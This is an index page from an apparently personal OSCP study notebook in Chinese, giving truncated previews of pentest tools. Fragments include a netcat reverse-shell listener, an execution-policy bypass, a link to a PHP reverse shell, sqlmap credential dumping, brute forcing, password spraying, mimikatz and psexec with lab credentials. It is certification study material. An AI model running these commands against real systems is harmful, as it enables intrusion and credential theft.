跳到主內容

【OSCP】Tools

【Data】SecLists

SecLists(安全列表)是一個包含多種類型的列表的集合,用於安全評估。這些列表包括用戶名、密碼、URL、敏感數據的grep字符串、fuzzing載荷等等。 其目標是使安全測試人員能夠將這個...

【Terminal】telnet

Telnet(Telecommunication Network)是一個網路協議和一個命令行工具,用於建立基於文本的遠程連接到遠程伺服器、設備或主機,以便進行遠程管理、測試和診斷。 #teln...

【Terminal】powercat

就是NetCat 的Powershell 版本 https://github.com/besimorhino/powercat  下載: https://github.com/besimor...

【Terminal】rlwrap

  # 安裝 sudo apt install rlwrap # listener 8888 rlwrap -cAr nc -nvlp8888 `rlwrap` 是一個用於包裹 Rea...

【web】【windows】【PowerShell】 iwr

`iwr` 是 Windows PowerShell 中的一個 cmdlet,用於發送 HTTP、HTTPS 或 FTP 請求,並檢索相應的響應。`iwr` 的全稱是 "Invoke-WebRe...

【Shell】powershell

啟動powershell # -ep bypass 繞過執行策略 PS C:\Users\stephanie> powershell -ep bypass Windows PowerS...

【shell】find

# 找尋可寫的資料夾 find / -writable -type d 2>/dev/null # 尋找當前用戶可寫目錄 oe@debian-privesc:~$ find / -writ...

【online】【編碼】jscompress.com

https://jscompress.com/ var ajaxRequest = new XMLHttpRequest(); var requestURL = "/wp-admin/use...

【online】【編碼】CyberChef

https://gchq.github.io/CyberChef

【PortScan】netcat

基本上,一個主機向目的地埠口的伺服器發送TCP SYN數據包。如果目的地埠口是開放的,伺服器將以SYN-ACK數據包回應,並且客戶端主機將發送ACK數據包以完成握手。如果握手成功完成,該埠口被認...

【PortScan】nmap

常用語法 ## nmap 預設會scan ip (主機探測) 與 port (服務探測) ## 列出網段內機器的ip (主機探測) # -sn (no service scan) 不掃...

【PortScan】rustscan

Rustscan (只做udp 掃描) RustScan 是一個用於快速、輕量級端口掃描的開源工具,使用 Rust 編程語言開發。它的目標是提供快速且高效的端口掃描,同時提供友好的用戶界面和一...

【GitHub】Gitrob 和 Gitleaks

Gitrob: Gitrob 是一個用於 GitHub 存儲庫的敏感信息搜索工具。它主要用於尋找在 GitHub 上公開的 Git 存儲庫中可能包含敏感信息的情況,例如金鑰、密碼、AP...

【DNS】Host

host 存在與否,有不同的回應 # host {domain} kali@kali:~$ host www.megacorpone.com www.megacorpone.com has...

【DNS】dnsrecon

dnsrecon 是一個用於執行域名系統(DNS)渗透测试和信息收集的工具。它提供了各種功能,用於識別目標域名的 DNS 記錄、發現子域名、枚舉主機名和 IP 地址等。以下是 dnsrecon ...

【DNS】DNSEnum

DNSEnum是另一個流行的DNS列舉工具,可以用來進一步自動化對megacorpone.com域的DNS列舉。我們可以傳遞一些選項給工具,但為了這個示例,我們只會傳遞目標域參數: kali@...

【DNS】whois

whois : service tcp/43

【DNS】nslookup

  C:\Users\student>nslookup mail.megacorptwo.com DNS request timed out. timeout was 2 seco...

【SMB】nbtscan

我們可以使用它來查詢NetBIOS名稱服務的有效NetBIOS名稱,並使用-r選項指定UDP端口137作為源端口。 kali@kali:~$ sudo nbtscan -r 192.168.5...

【SMB】WsgiDAV

們將首先在 Kali 系統上設置一個 WebDAV 共享。我們將使用 WsgiDAV2 作為 WebDAV 伺服器來主持和提供我們的文件。我們可以使用 pip3 來安裝 WsgiDAV。 ka...

【SMB】net view

它列出了屬於特定主機的域、資源和計算機。舉個例子,連接到client01虛擬機,我們可以列出運行在dc01上的所有共享。 C:\Users\student>net view \\dc01 /a...

【SMB】enum4linux

$ enum4linux -a -o 192.168.202.13 =========================================( Target Info...

【SMB】smbclient

  # //192.168.203.13/files => share folder # -c command smbclient -N //192.168.203.13/files -...

【SMB】【Remote】 CME ( CrackMapExec )

CrackMapExec(簡稱CME)是一個用於自動化測試和渗透測試的開源工具,旨在簡化與Windows環境中的Active Directory(AD)進行交互的過程。它是一個功能強大的渗透測試...

【SNMP】onesixtyone

OneSixtyOne(也稱為onesixty1或161)是一個用於 SNMP(Simple Network Management Protocol,簡單網路管理協議)掃描的命令行工具。SNMP...

【SNMP】snmpwalk

我們可以使用像snmpwalk這樣的工具來探測並查詢SNMP值,前提是我們知道SNMP的只讀社區字符串,而在大多數情況下它是“public”。     1.3.6.1.2.1.25.1.6...

【Romote】xfreerdp rdesktop

xfreerdp /cert-ignore /size:93% /v:192.168.198.151 /u:student /p:lab xfreerdp /cert-ignore /siz...

【PathBuster】Gobuster

 支援不同的列舉模式,包括fuzzing和dns,但目前,我們只會依賴dir模式,該模式列舉文件和目錄。我們需要使用-u參數指定目標IP,並使用-w參數指定單詞列表。默認運行的線程數是10;我們...

【linux】【提權】【弱掃】linpeas

# install sudo apt-get update sudo apt-get -y install peass # 複製到本地 kali@kali:~$ cp /usr/sh...

【Linux】【提權】GTFOBins

GTFOBins 是一個安全工具,用於收集和提供攻擊者在 Linux 和 Unix 系統上濫用的 "提升權限" 或 "逃逸" 技術。它的全名是 "GTFO (Get The Fudge Out)...

【AD】【列舉】ADRecon

ADRecon(Active Directory Reconnaissance)是一種用於對Active Directory(AD)環境進行信息收集和分析的工具或技術。Active Direct...

【AD】【列舉】BooldHound

BoooldHound(BloodHound)是一個用於Active Directory(AD)環境的安全分析和攻擊模擬工具。它旨在幫助安全專業人員、紅隊人員和藍隊人員更好地理解和評估AD環境中...

【Exploit】SearchSploit

SearchSploit 是一個命令行搜索工具,用於在本地系統上搜索 Exploit Database 存檔。這個存檔預設包含在 Kali Linux 中的 exploitdb 包中。我們建議在...

【Honeypot】canarytokens

https://canarytokens.org/generate 我們將使用Canarytokens,這是一個免費的網絡服務,生成帶有嵌入式令牌的鏈接,我們將其發送給目標。當目標在瀏覽器中打...

【AD】【列舉】PowerView.ps1

下載: https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 教學: https:/...

【AD】【列舉】PsLoggedOn

讓我們嘗試對之前嘗試列舉的計算機運行PsLoggedOn,首先是FILES04和WEB04。 PsLoggedOn位於CLIENT75的C:\Tools\PSTools目錄中。要使用它,我們只需...

【AD】【列舉】Get-Acl

我們將使用PowerShell的Get-Acl cmdlet。這個命令本質上將檢索我們使用 -Path 標誌定義的對象的權限並將它們打印在我們的PowerShell提示中。 PS C:\Too...

【AD】net

  # 使用者加入 group # net group {group name} {username} /add /domain PS C:\Tools> net group "Manag...

【AD】【解碼】gpp-decrypt

我們找到一個名為 old-policy-backup.xml 的文件: 由於文件夾的命名和文件本身的名稱,看起來這是一個較舊的域策略文件。這是域共享上的一個常見遺物,因為系統管理員在實施新...

【AD】【列舉】SharpHound

https://github.com/puckiestyle/powershell/blob/master/SharpHound.ps1 SharpHound 有幾種不同的格式可用。我們可以自...

【列舉】wpscan

WPScan 是一款用於檢測 WordPress 網站安全性的開源工具。以下是一些常見的指令用法的繁體中文說明。請注意,WPScan 的命令行參數和選項可能會因版本而略有變化,建議在使用時查閱最...

【SQL Injection】sqlmap

  kali@kali:~$ sqlmap -u http://192.168.50.19/blindsqli.php?user=1 -p user # 傾卸整個數據庫,包括用戶憑據 -...

【file】【列舉】

ExifTool 是一個用於讀取、編輯和寫入影像、音頻和視頻文件的元數據(metadata)的命令行工具。它由Phil Harvey開發,支援多種檔案格式,包括JPEG、TIFF、PNG、PDF...

【Linux】【列舉】linpeas

https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS `linpeas.sh` 是一個用於 Linux 系統的自動化信息搜集工...

【web】【列舉】whatweb

  # 安裝 sudo apt-get install whatweb # whatweb {domain} ┌──(kali㉿kali)-[~] └─$ whatweb www....

【web】【爆破】burpsuite

#啟動 kali@kali:~$ burpsuite https://bookstack.treemanou.com/books/treemanoscp/page/ch8-introduct...

【web】【爆破】gobuster

  # 安裝 sudo apt-get update sudo apt-get install gobuster # git hub # https://github.com/OJ...

【terminal】php-reverse-shell

https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php <?php // p...

【web】【linux】【shell】curl

  curl #`--path-as-is` 是在使用 cURL 命令時的一個特殊參數, # 它指示 cURL 將 URL 中的路徑部分視為原樣處理,而不進行百分比編碼(Percent-E...

【sql】impacket-mssqlclient

impacket-mssqlclient Administrator:Lab123@192.168.50.18 -windows-auth

【SQL_injection】github

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Inje...

【密碼】【破解】hashcat

https://hashcat.net/hashcat/ hashCode 範例 https://hashcat.net/wiki/doku.php?id=example_hashes # ...

【terminal】【impacket】psexec

要執行 psexec,我們可以輸入 impacket-psexec 並帶有兩個參數。第一個參數是 -hashes,它允許我們使用 NTLM 雜湊來對目標進行身份驗證。格式為 "LMHash:NT...

【SMB】【Net-NTLMv2雜湊監聽】Responder

  現在讓我們進行這個過程。首先,我們需要運行ip a以檢索所有接口的列表。然後,我們將以sudo運行Responder(在Kali上已經預安裝),以啟用處理各種協議的特權原始套接字操作所需的...

【shell】【impacket】ntlmrelayx

  # --no-http-server來停用HTTP伺服器,因為我們正在中繼SMB連接 # -smb2support添加對SMB2.3的支援。 # -t將目標設定為FILES02。 #...

【列舉】【提權】【Linux】unix-privesc-check

/usr/bin/unix-privesc-check kali@kali:~$ unix-privesc-check unix-privesc-check v1.4 ( http://pe...

【密碼】【字典】crunch

字典生成 # 最小和最大長度設置為 6 個字符 # 使用 -t 參數指定模式,然後將前三個字符硬編碼為 "Lab",後跟三位數字。 kali@kali:~$ crunch 6 6 -t L...

【破解】【SSH】Hydra

  # hydra -l {user} -P {password字典} {ip} -t 4 ssh -V kali@kali:~$ hydra -l eve -P wordlist 192...

【列舉】【shell】getcap

https://feichashao.com/capabilities_basic/ # 尋找設置uid檔案 joe@debian-privesc:~$ /usr/sbin/getcap -...

【port forwarding】socat

們將啟動一個詳細模式的(-ddd) Socat 進程。它將在 TCP 埠 2345 上監聽(TCP-LISTEN:2345),在收到連接時分叉為一個新的子進程(fork),而不是在單個連接後死亡...

【port forwarding】rinetd

https://github.com/samhocevar/rinetd rinetd 是一個簡單的 TCP 端口轉發工具,它可以將進入的 TCP 連接重定向到指定的目標 IP 地址和端口。以...

【port forwarding】proxychains

kali@kali:~$ tail /etc/proxychains4.conf 配置了Proxychains後,現在我們可以使用我們Kali機器上的smbclient列出HRSHARES...

【port forwarding】sshuttle

然而,它需要在SSH客戶端上具有root權限並在SSH伺服器上使用Python3,因此它並非始終是最輕量級的選擇。 # kali -> vm1 (192.168.50.63 | 10.4.50...

【滲透】Metasploit

產生payload 提權  getsystem 修改進程ID ps migrate {pid} getgiid 其他模組 hashdump: 轉儲 SAM 數據庫的內容 ...

【powershell】PowerView

PS C:\Tools> Import-Module .\PowerView.ps1 PS C:\Tools> Get-NetDomain PS C:\Tools> Get-NetUser ...

【powershell】PsLoggedOn

PsLoggedOn將列舉HKEY_USERS下的注冊表密鑰,以檢索已登錄用戶的安全標識符(SID)並將SID轉換為用戶名。 PsLoggedOn還將使用NetSessionEnum API查看...

【powershell】Sharphound

PS C:\Tools> Import-Module .\Sharphound.ps1 PS C:\Tools> Get-Help Invoke-BloodHound PS C:\T...

【雜湊】【AD】mimikatz

PS C:\Windows\system32> cd C:\Tools PS C:\Tools\> .\mimikatz.exe ... mimikatz # privilege:...

【powershell】【密碼噴灑】Spray-Passwords.ps1

PS C:\Users\jeff> cd C:\Tools PS C:\Tools> powershell -ep bypass ... PS C:\Tools> .\Spray-...

【密碼噴灑】kerbrute

我們可以獲取並緩存Kerberos TGT。我們需要提供用戶名和密碼。如果憑證有效,我們將獲取一個TGT。這種技術的優勢在於,它僅使用兩個UDP帧來確定密碼是否有效,因為它僅發送AS-REQ並檢...

【shell】【impacket】【AS-REP Roasting】GetNPUsers

kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast cor...

【AS-REP Roasting】Rubeus

# /nowrap,以防止將新行添加到生成的AS-REP哈希 PS C:\Users\jeff> cd C:\Tools PS C:\Tools> .\Rubeus.exe asrepr...

【powershell】【自訂】ldap search

function1.ps1 function LDAPSearch { param ( [string]$LDAPQuery ) $PDC ...

【powershell】【橫移】PsExec

  # 使用帳密連線至另一主機 .\PsExec64.exe -i \\WEB04 -u corp\jen -p Nexus123! cmd

【Tunneling】Chisel

# kali下載 wget https://github.com/jpillora/chisel/releases/download/v1.8.1/chisel_1.8.1_linux_amd...

【Tunneling】dnscat2

原生 dnscat2 https://teamssix.com/210608-150224.html https://github.com/iagox86/dnscat2   kali ...

【Windows】【弱掃】Seatbelt

Seatbelt 是一個 C# 項目,從進攻性和防禦性安全角度執行許多面向安全的主機調查「安全檢查」。 # 下載 wget https://github.com/r3motecontrol/...

【PortScan】Masscan

Masscan是網路大規模的連接埠掃描儀。它可以在5分鐘內掃描整個互聯網,每秒從一台機器上傳輸1000萬個資料包(和掃描者的頻寬有關,掃描速率高容易誤報) https://github.com...